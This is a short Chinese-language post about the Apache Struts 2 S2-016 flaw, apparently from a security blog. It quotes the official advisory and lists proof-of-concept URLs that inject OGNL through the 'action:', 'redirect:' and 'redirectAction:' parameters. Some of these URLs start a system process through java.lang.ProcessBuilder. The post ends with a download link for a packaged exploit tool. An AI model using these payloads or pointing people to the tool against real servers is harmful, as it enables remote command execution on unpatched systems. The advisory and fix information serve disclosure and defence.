这是一个代码执行漏洞，利用java代码来执行系统命令。
 
影响版本：Struts 2.0.0 – Struts 2.3.15
 
漏洞说明：
The Struts 2 DefaultActionMapper supports a method for short-circuit
navigation state changes by prefixing parameters with “action:” or
“redirect:”, followed by a desired navigational target expression. This
mechanism was intended to help with attaching navigational information
to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”,
“redirect:” or “redirectAction:” is not properly sanitized. Since said
information will be evaluated as OGNL expression against the value
stack, this introduces the possibility to inject server side code.
 
测试POC：
In the Struts Blank App, open following URLs.
Simple Expression – the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
Command Execution
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
解决方法：
DefaultActionMapper was changed to sanitize “action:”-prefixed
information properly. The features involved with
“redirect:”/”redirectAction:”-prefixed parameters were completely
dropped – see also S2-017.

官方说明：http://struts.apache.org/release/2.3.x/docs/s2-016.html

struts2最新s2-016代码执行漏洞exp利用工具下载 K8_Struts2_EXP_0718[K8]

下载地址：

http://pan.baidu.com/share/link?shareid=2765322418&uk=4045637737